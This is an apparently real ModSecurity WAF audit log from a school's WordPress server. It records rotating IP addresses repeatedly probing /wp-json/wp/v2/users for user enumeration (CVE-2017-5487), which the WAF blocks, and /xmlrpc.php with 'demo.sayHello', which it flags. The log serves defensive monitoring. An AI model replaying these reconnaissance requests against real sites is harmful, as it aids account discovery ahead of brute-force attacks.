Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe7cf32a-Z-- --588b2c2d-A-- [18/May/2025:00:40:50 +0700] aCjKIhKi5m5upc8uMd7ETgAAANI 103.236.140.4 47774 103.236.140.4 8181 --588b2c2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --588b2c2d-C-- demo.sayHello --588b2c2d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --588b2c2d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503650485836 4473 (- - -) Stopwatch2: 1747503650485836 4473; combined=3562, p1=453, p2=2886, p3=38, p4=39, p5=85, sr=55, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --588b2c2d-Z-- --9ac0e869-A-- [18/May/2025:00:41:03 +0700] aCjKL-m4kjNN-hEbWjI8oQAAAEM 103.236.140.4 48750 103.236.140.4 8181 --9ac0e869-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ac0e869-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac0e869-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503663549091 2135 (- - -) Stopwatch2: 1747503663549091 2135; combined=959, p1=321, p2=613, p3=0, p4=0, p5=25, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac0e869-Z-- --e67e946b-A-- [18/May/2025:00:41:13 +0700] aCjKOXyxdQCiyU1ENFc4agAAAA8 103.236.140.4 49460 103.236.140.4 8181 --e67e946b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e67e946b-C-- demo.sayHello --e67e946b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e67e946b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503673501101 5444 (- - -) Stopwatch2: 1747503673501101 5444; combined=4055, p1=545, p2=3240, p3=36, p4=41, p5=114, sr=67, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e67e946b-Z-- --47609a57-A-- [18/May/2025:00:42:22 +0700] aCjKfhKi5m5upc8uMd7GywAAAME 103.236.140.4 53338 103.236.140.4 8181 --47609a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47609a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47609a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503742522191 13554 (- - -) Stopwatch2: 1747503742522191 13554; combined=23785, p1=369, p2=698, p3=0, p4=0, p5=11371, sr=60, sw=0, l=0, gc=11347 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47609a57-Z-- --1ef79c7e-A-- [18/May/2025:00:42:29 +0700] aCjKhXyxdQCiyU1ENFc57gAAAA8 103.236.140.4 53596 103.236.140.4 8181 --1ef79c7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ef79c7e-C-- demo.sayHello --1ef79c7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ef79c7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503749050784 5815 (- - -) Stopwatch2: 1747503749050784 5815; combined=4278, p1=655, p2=3408, p3=36, p4=42, p5=83, sr=73, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ef79c7e-Z-- --2b613423-A-- [18/May/2025:00:44:36 +0700] aCjLBATOsBn9MSWb6WJ3ugAAAJU 103.236.140.4 60846 103.236.140.4 8181 --2b613423-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b613423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b613423-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503876762063 2347 (- - -) Stopwatch2: 1747503876762063 2347; combined=1117, p1=339, p2=754, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b613423-Z-- --56ddb04d-A-- [18/May/2025:00:44:41 +0700] aCjLCem4kjNN-hEbWjJCJgAAAFA 103.236.140.4 32800 103.236.140.4 8181 --56ddb04d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56ddb04d-C-- demo.sayHello --56ddb04d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56ddb04d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503881002949 5647 (- - -) Stopwatch2: 1747503881002949 5647; combined=4323, p1=565, p2=3471, p3=44, p4=57, p5=132, sr=64, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56ddb04d-Z-- --9ce77916-A-- [18/May/2025:00:44:43 +0700] aCjLCxKi5m5upc8uMd7K7AAAANg 103.236.140.4 32900 103.236.140.4 8181 --9ce77916-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ce77916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ce77916-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503883154546 1984 (- - -) Stopwatch2: 1747503883154546 1984; combined=862, p1=291, p2=552, p3=0, p4=0, p5=19, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ce77916-Z-- --6d1af93e-A-- [18/May/2025:00:44:56 +0700] aCjLGHyxdQCiyU1ENFc8egAAAAM 103.236.140.4 33438 103.236.140.4 8181 --6d1af93e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d1af93e-C-- demo.sayHello --6d1af93e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d1af93e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503896547235 5774 (- - -) Stopwatch2: 1747503896547235 5774; combined=4278, p1=529, p2=3519, p3=36, p4=40, p5=91, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d1af93e-Z-- --e0f2e966-A-- [18/May/2025:00:45:51 +0700] aCjLTxKi5m5upc8uMd7MzQAAAMw 103.236.140.4 37474 103.236.140.4 8181 --e0f2e966-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0f2e966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0f2e966-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503951396210 2222 (- - -) Stopwatch2: 1747503951396210 2222; combined=1077, p1=354, p2=693, p3=0, p4=0, p5=30, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0f2e966-Z-- --78f4b958-A-- [18/May/2025:00:45:57 +0700] aCjLVQTOsBn9MSWb6WJ5kgAAAI8 103.236.140.4 37948 103.236.140.4 8181 --78f4b958-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78f4b958-C-- demo.sayHello --78f4b958-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f4b958-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503957912678 6214 (- - -) Stopwatch2: 1747503957912678 6214; combined=4727, p1=529, p2=3963, p3=46, p4=48, p5=83, sr=49, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f4b958-Z-- --9b7b9368-A-- [18/May/2025:00:47:08 +0700] aCjLnHyxdQCiyU1ENFc__wAAABE 103.236.140.4 43034 103.236.140.4 8181 --9b7b9368-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9b7b9368-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b7b9368-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504028327007 3654 (- - -) Stopwatch2: 1747504028327007 3654; combined=2110, p1=672, p2=1399, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b7b9368-Z-- --6fcd9161-A-- [18/May/2025:00:47:13 +0700] aCjLoRKi5m5upc8uMd7PEwAAAMA 103.236.140.4 43294 103.236.140.4 8181 --6fcd9161-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6fcd9161-C-- demo.sayHello --6fcd9161-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fcd9161-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504033925971 6377 (- - -) Stopwatch2: 1747504033925971 6377; combined=5029, p1=684, p2=4106, p3=42, p4=62, p5=82, sr=63, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fcd9161-Z-- --aa780072-A-- [18/May/2025:00:49:49 +0700] aCjMPem4kjNN-hEbWjJK0QAAAFA 103.236.140.4 54326 103.236.140.4 8181 --aa780072-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa780072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa780072-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504189982152 3160 (- - -) Stopwatch2: 1747504189982152 3160; combined=1726, p1=531, p2=1165, p3=0, p4=0, p5=29, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa780072-Z-- --c73cf01d-A-- [18/May/2025:00:49:59 +0700] aCjMRxKi5m5upc8uMd7TkQAAAMM 103.236.140.4 54808 103.236.140.4 8181 --c73cf01d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c73cf01d-C-- demo.sayHello --c73cf01d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c73cf01d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504199926683 7188 (- - -) Stopwatch2: 1747504199926683 7188; combined=5743, p1=786, p2=4695, p3=47, p4=64, p5=91, sr=71, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c73cf01d-Z-- --2edd4e7c-A-- [18/May/2025:00:50:06 +0700] aCjMTum4kjNN-hEbWjJLGgAAAEg 103.236.140.4 55072 103.236.140.4 8181 --2edd4e7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2edd4e7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2edd4e7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504206334581 3250 (- - -) Stopwatch2: 1747504206334581 3250; combined=1532, p1=398, p2=1096, p3=0, p4=0, p5=37, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2edd4e7c-Z-- --df43d724-A-- [18/May/2025:00:50:11 +0700] aCjMU3yxdQCiyU1ENFdFHQAAABQ 103.236.140.4 55360 103.236.140.4 8181 --df43d724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df43d724-C-- demo.sayHello --df43d724-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df43d724-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: 